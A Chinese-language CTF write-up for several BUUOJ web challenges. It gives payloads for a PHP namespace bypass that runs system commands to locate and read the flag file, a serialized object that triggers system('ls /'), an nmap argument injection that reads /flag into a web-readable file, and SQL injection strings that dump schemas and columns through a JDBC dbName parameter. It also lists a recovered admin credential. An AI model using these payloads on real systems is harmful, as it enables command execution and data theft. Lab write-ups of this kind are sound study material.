姿势1命名空间绕过。
func=\\system
p=find / -name flag*
func=\\system
p=cat /xx/flag
姿势2序列化
buu群里和大佬学到还可以用反序列化
func=unserialize&p=0:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
nmap
127.0.0.1' -iL /flag -oN fuck.txt '
访问http:xxx/fuck.txt即可
Thinkjava
这个题一看404本来以为项目出错了,还麻烦了赵总,buuoj无敌。
第一步是一个sql注入,但是我把库爆干净了也没出什么东西。
原理就是下方的两张图片的关键性代码。
一个jdbc连接示例:
jdbc:mysql://127.0.0.1:3306/name?useUnicode=true&xx=xxxx&xx=xx
上方这段是一个jdbc连接的配置项,用过高版本mysql和jdbc的应该很清楚,不用多说。
爆库
sql注入具体操作大家都会我就写两个简单的示例
dbName=myapp?useUnicode=true'union/**/select/**/group_concat(SCHEMA_NAME)from(information_schema.schemata)#
爆字段名
dbName=myapp?useUnicode=true'union/**/select/**/group_concat(column_name)from(information_schema.columns)where(table_name='user')and(table_schema='myapp')#
有价值信息
数据库除了自带得几个数据库就只有myapp
表只有一个user表
字段有
id,name,pwd
对应的字段值
id name passwd
1 admin admin@Rrrr_ctf_asde
部分过程结果截图
脑瓜子嗡嗡的
这里写的太多了,Think Java后续请参考最新博客 :https://www.cnblogs.com/h3zh1/p/12914439.html